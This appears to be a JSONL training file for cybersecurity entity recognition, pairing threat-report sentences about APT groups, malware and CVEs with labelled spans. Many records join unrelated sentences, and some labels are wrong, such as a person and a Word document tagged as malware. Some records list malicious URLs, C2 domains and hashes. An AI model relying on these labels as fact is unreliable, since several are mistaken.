{"text": "The new variant caught our attention because it ’ s an advanced malware with unmistakable malicious characteristic and behavior and yet manages to evade many available protections , registering a low detection rate against security solutions . Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan . Not yet implemented cases ( e.g , Darkrace specifically targets Windows operating systems and has several similarities to LockBit .", "spans": {"ORGANIZATION: Unit 42": [[276, 283]], "ORGANIZATION: government agencies": [[363, 382]], "MALWARE: Darkrace": [[441, 449]], "SYSTEM: Windows operating systems": [[471, 496]], "THREAT_ACTOR: LockBit": [[529, 536]]}, "info": {"id": "cyberner_stix_train_005851", "source": "cyberner_stix_train"}}
{"text": "Ports 6203 and 6204 : Facebook extraction service . Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks . While some are more neutral , quoting from newspapers and the media , others seem to report fake news to spread misinformation that serves a political agenda . Ways our customers can detect and block this threat are listed below .", "spans": {"ORGANIZATION: Facebook": [[22, 30]], "TOOL: ProjectSauron modules": [[62, 83]]}, "info": {"id": "cyberner_stix_train_005852", "source": "cyberner_stix_train"}}
{"text": "After the the first instance of BrainTest was detected , Google removed the app from Google Play . The Word document usually exploits CVE-2012-0158 . We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools .", "spans": {"MALWARE: BrainTest": [[32, 41]], "ORGANIZATION: Google": [[57, 63]], "SYSTEM: Google Play": [[85, 96]], "MALWARE: Word document": [[103, 116]], "VULNERABILITY: CVE-2012-0158": [[134, 147]], "THREAT_ACTOR: APT10": [[172, 177]]}, "info": {"id": "cyberner_stix_train_005853", "source": "cyberner_stix_train"}}
{"text": "The operation , known as FASTCash” has enabled Lazarus to fraudulently empty ATMs of cash . In March 2018 we detected an ongoing campaign .", "spans": {"THREAT_ACTOR: Lazarus": [[47, 54]]}, "info": {"id": "cyberner_stix_train_005854", "source": "cyberner_stix_train"}}
{"text": "No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . The Winnti umbrella and closely associated entities has been active since at least 2009 .", "spans": {"VULNERABILITY: zero-day vulnerabilities": [[3, 27]], "VULNERABILITY: CVE-2011-3544": [[124, 137]], "VULNERABILITY: CVE-2010-0738": [[185, 198]], "ORGANIZATION: Dell SecureWorks'": [[231, 248]], "MALWARE: Winnti": [[276, 282]]}, "info": {"id": "cyberner_stix_train_005855", "source": "cyberner_stix_train"}}
{"text": "It is possible these names were used in spear phishing emails because they would seem benign to Saudi-based employees and lure them to open the attachment .", "spans": {"TOOL: emails": [[55, 61]]}, "info": {"id": "cyberner_stix_train_005856", "source": "cyberner_stix_train"}}
{"text": "Ports 8080 and 5900 are common ports used with legitimate protocols , but can be abused by attackers when they are not secured .", "spans": {}, "info": {"id": "cyberner_stix_train_005857", "source": "cyberner_stix_train"}}
{"text": "Of course , not all the opcodes are can be easily read and understood due to additional steps that the authors have taken to make analysis extremely complicated . It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism . Winnti : 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f https://nw.infestexe.com/version/last.php . By understanding the TTPs of the leaked source codes , defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[187, 200]], "THREAT_ACTOR: Winnti": [[301, 307]], "FILEPATH: 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f": [[310, 350]], "URL: https://nw.infestexe.com/version/last.php": [[351, 392]]}, "info": {"id": "cyberner_stix_train_005858", "source": "cyberner_stix_train"}}
{"text": "During patching , the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip . It appears the Desert Falcons sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) . If you want to be a savvy and safe traveler , it ’s highly recommended to use a virtual payment card for reservations made via OTAs , as these cards normally expire after one charge . The MiniDuke attackers are still active at this time and have created malware as recently as February 20 , 2013 .", "spans": {"THREAT_ACTOR: Desert Falcons": [[147, 161]], "ORGANIZATION: National Liberation Front": [[411, 436]], "TOOL: OTAs": [[588, 592]], "THREAT_ACTOR: MiniDuke attackers": [[649, 667]]}, "info": {"id": "cyberner_stix_train_005859", "source": "cyberner_stix_train"}}
{"text": "Our Quasar RAT will connect to our own ( secured , of course ) Quasar serve , allowing us to control that attacker ’s server with his own RAT .", "spans": {"MALWARE: Quasar RAT": [[4, 14]], "MALWARE: Quasar": [[63, 69]], "TOOL: RAT": [[138, 141]]}, "info": {"id": "cyberner_stix_train_005860", "source": "cyberner_stix_train"}}
{"text": "The Trojan functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server .", "spans": {"MALWARE: Trojan": [[4, 10], [96, 102]], "TOOL: emails": [[62, 68]], "TOOL: C2": [[111, 113]]}, "info": {"id": "cyberner_stix_train_005861", "source": "cyberner_stix_train"}}
{"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[0, 12]], "THREAT_ACTOR: group": [[39, 44]], "ORGANIZATION: Government": [[106, 116]], "ORGANIZATION: Defense": [[119, 126]], "ORGANIZATION: Research": [[129, 137]], "ORGANIZATION: Technology sectors": [[144, 162]], "ORGANIZATION: US Defense": [[217, 227]], "ORGANIZATION: satellite": [[241, 250]], "ORGANIZATION: aerospace industries": [[255, 275]], "MALWARE: Potao": [[278, 283]], "MALWARE: malware": [[408, 415]]}, "info": {"id": "cyberner_stix_train_005862", "source": "cyberner_stix_train"}}
{"text": "WolfRAT application screen The Google GMS and Firebase service has been added , however , no configuration has been found , even though services seem to be referenced in the of a new class . t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . Both the THREEBYTE and HIGHTIDE backdoors were written to the same filepath of C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe ; Spearphishing Attachment APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.002 Phishing : Spearphishing Link APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.003 Phishing : Spearphishing via Service APT29 has used the legitimate mailing service Constant Contact to send phishing e - mails .003", "spans": {"MALWARE: WolfRAT": [[0, 7]], "SYSTEM: Google GMS": [[31, 41]], "SYSTEM: Firebase": [[46, 54]], "TOOL: DNS-based attack technique": [[216, 242]], "ORGANIZATION: Arbor 's ASERT Team": [[373, 392]], "MALWARE: THREEBYTE": [[438, 447]], "MALWARE: HIGHTIDE backdoors": [[452, 470]], "FILEPATH: SETTINGS\\Temp\\word.exe": [[547, 569]], "THREAT_ACTOR: Spearphishing Attachment APT29": [[572, 602]], "THREAT_ACTOR: Spearphishing Link APT29": [[717, 741]], "THREAT_ACTOR: Spearphishing via Service APT29": [[874, 905]]}, "info": {"id": "cyberner_stix_train_005863", "source": "cyberner_stix_train"}}
{"text": "Dragos does not corroborate nor conduct political attribution to threat activity . Of note , this methodology of naming abstracts aACT the \" who \" element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[157, 165]], "ORGANIZATION: research institution": [[225, 245]]}, "info": {"id": "cyberner_stix_train_005864", "source": "cyberner_stix_train"}}
{"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . the US had data stolen by members of Emissary Panda .", "spans": {"ORGANIZATION: Unit 42": [[29, 36]], "MALWARE: EPS files": [[109, 118]], "VULNERABILITY: CVE-2015-2545": [[133, 146]], "VULNERABILITY: CVE-2017-0261": [[151, 164]], "THREAT_ACTOR: Emissary Panda": [[220, 234]]}, "info": {"id": "cyberner_stix_train_005865", "source": "cyberner_stix_train"}}
{"text": "– a possible misspelling of the “ Opera ”", "spans": {"TOOL: Opera": [[34, 39]]}, "info": {"id": "cyberner_stix_train_005866", "source": "cyberner_stix_train"}}
{"text": "FakeSpy is an information stealer that exfiltrates and sends SMS messages , steals financial and application data , reads account information and contact lists , and more . APT10 frequently targets the Southeast Asia region . The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: APT10": [[173, 178]], "MALWARE: VNC": [[274, 277]], "TOOL: C2": [[321, 323]]}, "info": {"id": "cyberner_stix_train_005867", "source": "cyberner_stix_train"}}
{"text": "The decoy document is a flyer concerning the Cyber Conflict U.S. conference with the following filename Conference_on_Cyber_Conflict.doc .", "spans": {"FILEPATH: Conference_on_Cyber_Conflict.doc": [[104, 136]]}, "info": {"id": "cyberner_stix_train_005868", "source": "cyberner_stix_train"}}
{"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"VULNERABILITY: Heartbleed vulnerability": [[31, 55]], "VULNERABILITY: exploit": [[155, 162]], "VULNERABILITY: CVE-2016-4117": [[169, 182]]}, "info": {"id": "cyberner_stix_train_005869", "source": "cyberner_stix_train"}}
{"text": "APT28 ’s already wide-ranging capabilities and tactics are continuing to grow and refine as the group expands its infection vectors .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_005870", "source": "cyberner_stix_train"}}
{"text": "A decoy document is deployed in this attack , with the contents purporting be a publicly available document from the United Nations regarding the Republic of Uzbekistan .", "spans": {}, "info": {"id": "cyberner_stix_train_005871", "source": "cyberner_stix_train"}}
{"text": "] ee Backend server October 8 , 2020 Sophisticated new Android malware marks the latest evolution of mobile ransomware Attackers are persistent and motivated to continuously evolve – and no platform is immune . While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas . the immediate values used in comparison look different from assigned ones . COSMICENERGY accomplishes this via its two derivative components , which we track as PIEHOP and LIGHTWORK ( see appendices for technical analyses ) .", "spans": {"SYSTEM: Android": [[55, 62]], "THREAT_ACTOR: attackers": [[240, 249]], "THREAT_ACTOR: Gorgon Group": [[297, 309]], "MALWARE: COSMICENERGY": [[445, 457]], "TOOL: PIEHOP": [[530, 536]], "TOOL: LIGHTWORK": [[541, 550]]}, "info": {"id": "cyberner_stix_train_005872", "source": "cyberner_stix_train"}}
{"text": "Obviously , this inevitably leaves the device open not only to further compromise but to data tampering as well . While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday . In addition to the documents , the content includes a number of political cartoons that criticize Hamas ’ relations with Iran and Hamas ’ standing as a resistance movement . Facebook stated that the attackers also pretended to work in hospitality , medicine , journalism , NGOs , or airlines , sometimes conversing with their targets for months with profiles across various social media platforms .", "spans": {"TOOL: hacktools": [[168, 177]], "ORGANIZATION: Facebook": [[423, 431]]}, "info": {"id": "cyberner_stix_train_005873", "source": "cyberner_stix_train"}}
{"text": "Impact T1516 Input Injection Can enter text and perform clicks on behalf of user . The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim’s network . KONNI : A Malware Under The Radar For Years .", "spans": {"THREAT_ACTOR: Waterbug": [[114, 122]], "MALWARE: KONNI": [[278, 283]], "TOOL: Radar": [[306, 311]]}, "info": {"id": "cyberner_stix_train_005874", "source": "cyberner_stix_train"}}
{"text": "The exploit installs Silence’s loader , designed to download backdoors and other malicious programs . Corkow provided remote access to the ITS-Broker system terminal by 《 Platforma soft 》 Ltd. , which enabled the fraud to be committed .", "spans": {"VULNERABILITY: exploit": [[4, 11]], "THREAT_ACTOR: Silence’s": [[21, 30]], "MALWARE: Corkow": [[102, 108]]}, "info": {"id": "cyberner_stix_train_005875", "source": "cyberner_stix_train"}}
{"text": "] it The rise of mobile banker Asacub 28 AUG 2018 We encountered the Trojan-Banker.AndroidOS.Asacub family for the first time in 2015 , when the first versions of the malware were detected , analyzed , and found to be more adept at spying than stealing funds . In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) . The Pierogi backdoor discovered by Cybereason during this investigation seems to be undocumented and gives the threat actors espionage capabilities over their victims . Indicators of Compromise vs. Indicators of Attack", "spans": {"MALWARE: Asacub": [[31, 37]], "MALWARE: Trojan-Banker.AndroidOS.Asacub": [[69, 99]], "THREAT_ACTOR: XENOTIME": [[277, 285]], "ORGANIZATION: research institutions": [[430, 451]], "MALWARE: Pierogi backdoor": [[624, 640]], "ORGANIZATION: Cybereason": [[655, 665]]}, "info": {"id": "cyberner_stix_train_005876", "source": "cyberner_stix_train"}}
{"text": "This sample is packed by “ Netz ” , a simple .NET Framework packer which stores the original executable compressed ( zlib ) as a resource .", "spans": {"TOOL: Netz": [[27, 31]], "TOOL: .NET": [[45, 49]]}, "info": {"id": "cyberner_stix_train_005877", "source": "cyberner_stix_train"}}
{"text": "The components were an unexpected inclusion in this particular toolset .", "spans": {}, "info": {"id": "cyberner_stix_train_005878", "source": "cyberner_stix_train"}}
{"text": "We expect to see more diversification in the social engineering lures this threat group employs as time goes on . APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time . In order to perform the deobfuscation , Facebook has spotted that same malware being used in this most recent campaign , but this operation has a far broader set of infection techniques and targets outside of the Middle East .", "spans": {"THREAT_ACTOR: APT38": [[114, 119]], "ORGANIZATION: financial institutions": [[199, 221]], "TOOL: SWIFT": [[257, 262]], "ORGANIZATION: Facebook": [[350, 358]], "MALWARE: malware": [[381, 388]], "ORGANIZATION: targets outside of the Middle East": [[500, 534]]}, "info": {"id": "cyberner_stix_train_005879", "source": "cyberner_stix_train"}}
{"text": "IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight.Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates .", "spans": {"TOOL: IoT": [[0, 3], [149, 152]]}, "info": {"id": "cyberner_stix_train_005880", "source": "cyberner_stix_train"}}
{"text": "We identified new MSIL components deployed by Zebrocy .", "spans": {"TOOL: MSIL": [[18, 22]], "MALWARE: Zebrocy": [[46, 53]]}, "info": {"id": "cyberner_stix_train_005881", "source": "cyberner_stix_train"}}
{"text": "The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions , ATM compromise , and other monetization schemes . PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage .", "spans": {"TOOL: CARBANAK malware": [[15, 31]], "THREAT_ACTOR: FIN7": [[35, 39]], "ORGANIZATION: banking transactions": [[179, 199]]}, "info": {"id": "cyberner_stix_train_005882", "source": "cyberner_stix_train"}}
{"text": "The HTA files contained job descriptions and links to job postings on popular employment websites . The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand .", "spans": {"MALWARE: HTA files": [[4, 13]], "MALWARE: decoy": [[126, 131]], "MALWARE: Chitpas Tant Kridakon": [[151, 172]]}, "info": {"id": "cyberner_stix_train_005883", "source": "cyberner_stix_train"}}
{"text": "The 24 target apps belong to 7 different Spanish banks : Caixa bank , Bankinter , Bankia , BBVA , EVO Banco , Kutxabank and Santander . Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , ” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . These reports discussed the group ’s malware , Daserf ( a.k.a Muirim or Nioupale ) and some additional downloader programs .", "spans": {"SYSTEM: Caixa bank": [[57, 67]], "SYSTEM: Bankinter": [[70, 79]], "SYSTEM: Bankia": [[82, 88]], "SYSTEM: BBVA": [[91, 95]], "SYSTEM: EVO Banco": [[98, 107]], "SYSTEM: Kutxabank": [[110, 119]], "SYSTEM: Santander": [[124, 133]], "THREAT_ACTOR: MSS": [[252, 255]], "MALWARE: Daserf": [[516, 522]], "MALWARE: Muirim": [[531, 537]], "MALWARE: Nioupale": [[541, 549]]}, "info": {"id": "cyberner_stix_train_005884", "source": "cyberner_stix_train"}}
{"text": "In addition , the malware samples included the kasper PDB string reported by Unit 42 , prompting us to conclude that we were likely looking at new variants of KASPERAGENT .", "spans": {"ORGANIZATION: Unit 42": [[77, 84]], "MALWARE: KASPERAGENT": [[159, 170]]}, "info": {"id": "cyberner_stix_train_005885", "source": "cyberner_stix_train"}}
{"text": "After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network . Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication .", "spans": {}, "info": {"id": "cyberner_stix_train_005886", "source": "cyberner_stix_train"}}
{"text": "CARBANAK malware has been used heavily by FIN7 in previous operations . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"TOOL: CARBANAK": [[0, 8]], "THREAT_ACTOR: FIN7": [[42, 46]], "THREAT_ACTOR: admin@338": [[76, 85]], "MALWARE: Poison Ivy RAT": [[103, 117]], "MALWARE: WinHTTPHelper": [[122, 135]], "MALWARE: malware": [[136, 143]], "ORGANIZATION: government officials": [[175, 195]]}, "info": {"id": "cyberner_stix_train_005887", "source": "cyberner_stix_train"}}
{"text": "] it Brescia server1cs.exodus.connexxa [ . ЦНИИХМ ) , a Russian government-owned technical research institution located in Moscow . The GUID generated by the malware is saved in a file called GUID.bin . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": {"ORGANIZATION: research institution": [[91, 111]], "TOOL: GUID": [[136, 140]], "FILEPATH: GUID.bin": [[192, 200]]}, "info": {"id": "cyberner_stix_train_005888", "source": "cyberner_stix_train"}}
{"text": "AntSword webshell has no functionality other than running a script provided by the AntSword Shell Manager , specifically within a field named Darr1R1ng of an HTTP POST request .", "spans": {"TOOL: AntSword": [[0, 8], [83, 91]], "TOOL: Shell Manager": [[92, 105]]}, "info": {"id": "cyberner_stix_train_005889", "source": "cyberner_stix_train"}}
{"text": "Let ’ s take an in-depth look at Asacub 5.0.3 , the most widespread version in 2018 . In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS . However , while we observed the presence of the codes , the functions of upd , sync and aptitude were disabled in the kits ’ latest version . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": {"MALWARE: Asacub": [[33, 39]], "ORGANIZATION: CTU": [[110, 113]], "THREAT_ACTOR: TG-3390": [[128, 135]], "TOOL: Hunter web application scanning tool": [[149, 185]]}, "info": {"id": "cyberner_stix_train_005890", "source": "cyberner_stix_train"}}
{"text": "The names used for Android components are similar : Similarities with AnubisSimilarities with Anubis When analyzing these components , similarities were found in the code of both malware families : Similarities with Anubis Another major change that indicated that the actor copied code from the Anubis Trojan is the way of handling configuration values . They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . One of subdomains , news.softfix.co.kr was the C2 server of Daserf ( 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 ) .", "spans": {"SYSTEM: Android": [[19, 26]], "MALWARE: Anubis": [[94, 100], [295, 301]], "SYSTEM: Anubis": [[216, 222]], "TOOL: Visma": [[475, 480]], "TOOL: Dropbox API": [[496, 507]], "DOMAIN: news.softfix.co.kr": [[530, 548]], "TOOL: C2": [[557, 559]], "MALWARE: Daserf": [[570, 576]], "FILEPATH: 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423": [[579, 643]]}, "info": {"id": "cyberner_stix_train_005891", "source": "cyberner_stix_train"}}
{"text": "A full list of all possible commands with descriptions can be found in Appendix II below . On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations . APT33 : a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2 Quasar RAT . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": {"ORGANIZATION: McAfee": [[112, 118]], "THREAT_ACTOR: cybercrime group": [[139, 155]], "THREAT_ACTOR: HIDDEN COBRA": [[156, 168]], "ORGANIZATION: cryptocurrency": [[189, 203]], "ORGANIZATION: financial organizations": [[208, 231]], "THREAT_ACTOR: APT33": [[234, 239]], "MALWARE: a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2 Quasar RAT": [[242, 324]], "MALWARE: fake / rogue anti - virus products": [[419, 453]]}, "info": {"id": "cyberner_stix_train_005892", "source": "cyberner_stix_train"}}
{"text": "Additional pivoting based on artifacts unique to this malware family expanded our dataset to hundreds of samples used over the last several years .", "spans": {}, "info": {"id": "cyberner_stix_train_005893", "source": "cyberner_stix_train"}}
{"text": "A new class was added called com.utils.RestClient . Chafer , uses Backdoor.Remexi.B . Similarly , WATERSPOUT is a newly discovered backdoor and the threat actors behind the campaign have not been positively identified . Derusbi has used unencrypted HTTP on port 443 for C2.[12 ]", "spans": {"TOOL: Backdoor.Remexi.B": [[66, 83]], "MALWARE: WATERSPOUT": [[98, 108]], "MALWARE: Derusbi": [[220, 227]]}, "info": {"id": "cyberner_stix_train_005894", "source": "cyberner_stix_train"}}
{"text": "simple CLI interface that ask when started for IP ,Port and proxy configuration to generate the initial payloads .", "spans": {"TOOL: CLI": [[7, 10]]}, "info": {"id": "cyberner_stix_train_005895", "source": "cyberner_stix_train"}}
{"text": "We assume it was rushed because , unlike GlanceLove , it lacked any real obfuscation . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . Using the VirusTotal Graph functionality these variants could be organized into several groups that were commonly associated by either metadata or document structures like macros or embedded image files ( depicted in the image below ) . None on the CrowdStrike Falcon ® console and of the market - leading CrowdStrike Falcon ® platform in action .", "spans": {"MALWARE: GlanceLove": [[41, 51]], "THREAT_ACTOR: APT32": [[97, 102]], "MALWARE: Vietnam.exe": [[201, 212]], "ORGANIZATION: diaspora": [[272, 280]], "TOOL: VirusTotal Graph": [[311, 327]], "TOOL: CrowdStrike Falcon": [[550, 568], [607, 625]]}, "info": {"id": "cyberner_stix_train_005896", "source": "cyberner_stix_train"}}
{"text": "Charger was found embedded in an app called EnergyRescue . Silence also used Russian-language web hosting services . FIN7 ’s last campaigns were targeting banks in Europe and Central America . Monitor for contextual data about a file , which may include information such as name , the content ( ex : signature , headers , or data / media ) , user / ower , permissions that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"MALWARE: Charger": [[0, 7]], "MALWARE: EnergyRescue": [[44, 56]], "TOOL: web hosting services": [[94, 114]], "THREAT_ACTOR: FIN7": [[117, 121]]}, "info": {"id": "cyberner_stix_train_005897", "source": "cyberner_stix_train"}}
{"text": "Gooligan potentially affects devices on Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop ) , which is over 74 % of in-market devices today . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions . another determines global variables , Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop )": [[40, 92]], "THREAT_ACTOR: APT38": [[147, 152]], "TOOL: DYEPACK": [[158, 165]], "ORGANIZATION: bank personnel": [[263, 277]], "THREAT_ACTOR: Dukes": [[393, 398]]}, "info": {"id": "cyberner_stix_train_005898", "source": "cyberner_stix_train"}}
{"text": ". The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks . APT33 : a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2 AutoIt backdoor . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": {"ORGANIZATION: Advanced Threat Research": [[6, 30]], "THREAT_ACTOR: actors": [[105, 111]], "ORGANIZATION: banks": [[129, 134]], "THREAT_ACTOR: APT33": [[137, 142]], "MALWARE: a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2 AutoIt backdoor": [[145, 232]]}, "info": {"id": "cyberner_stix_train_005899", "source": "cyberner_stix_train"}}
{"text": "The tool is written in C# whose malicious code exists in a namespace called cannon , which is the basis of the Trojan ’s name .", "spans": {"TOOL: C#": [[23, 25]], "MALWARE: cannon": [[76, 82]], "MALWARE: Trojan": [[111, 117]]}, "info": {"id": "cyberner_stix_train_005900", "source": "cyberner_stix_train"}}
{"text": "] it Catania server3.exodus.connexxa [ . XENOTIME configured TRISIS based on the specifics and functions of the Triconex system within the industrial control ( ICS ) environment . Uploading data ( mainly screenshots ) to the C2 : The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": {"THREAT_ACTOR: XENOTIME": [[41, 49]], "TOOL: TRISIS": [[61, 67]], "TOOL: ICS": [[160, 163]], "TOOL: C2": [[225, 227]], "VULNERABILITY: leaked tooling included a Python script , , that when executed": [[234, 296]]}, "info": {"id": "cyberner_stix_train_005901", "source": "cyberner_stix_train"}}
{"text": "While investing a lot of resources in the development of this malware , the actor behind “ Agent Smith ” does not want a real update to remove all of the changes made , so here is where the “ patch ” module comes in to play With the sole purpose of disabling automatic updates for the infected application , this module observes the update directory for the original application and removes the file once it appears . Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names . These executables are monitoring services for maintaining Dexphot ’s components . While there is a very large number of vulnerable websites , we already see some that have been injected with multiple different malicious code .", "spans": {"MALWARE: Agent Smith": [[91, 102]], "THREAT_ACTOR: Numbered Panda": [[441, 455]], "ORGANIZATION: security community": [[530, 548]], "MALWARE: Dexphot": [[632, 639]]}, "info": {"id": "cyberner_stix_train_005902", "source": "cyberner_stix_train"}}
{"text": "Kaspersky researchers attribute the campaign , which we call SpoiledLegacy” , to the LuckyMouse APT group (aka EmissaryPanda and APT27) . The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD to decrypt the data .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: LuckyMouse": [[85, 95]], "THREAT_ACTOR: EmissaryPanda": [[111, 124]], "THREAT_ACTOR: APT27)": [[129, 135]], "FILEPATH: malware": [[142, 149]], "FILEPATH: .WCRY extension": [[188, 203]]}, "info": {"id": "cyberner_stix_train_005903", "source": "cyberner_stix_train"}}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: specific individuals": [[82, 102]], "VULNERABILITY: zero-day exploits": [[143, 160]], "THREAT_ACTOR: MoneyTaker": [[220, 230]]}, "info": {"id": "cyberner_stix_train_005904", "source": "cyberner_stix_train"}}
{"text": "Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: ScarCruft": [[26, 35]], "VULNERABILITY: zero-day": [[65, 73]], "VULNERABILITY: CVE-2016-0147": [[76, 89]], "ORGANIZATION: Deepen": [[167, 173]], "ORGANIZATION: China and US relations experts": [[262, 292]], "ORGANIZATION: Defense Department": [[295, 313]], "ORGANIZATION: geospatial groups": [[329, 346]], "ORGANIZATION: federal government": [[358, 376]]}, "info": {"id": "cyberner_stix_train_005905", "source": "cyberner_stix_train"}}
{"text": "On the next step this file is executed by rundll32.exe via the KlpSvc export .", "spans": {"FILEPATH: rundll32.exe": [[42, 54]], "TOOL: KlpSvc": [[63, 69]]}, "info": {"id": "cyberner_stix_train_005906", "source": "cyberner_stix_train"}}
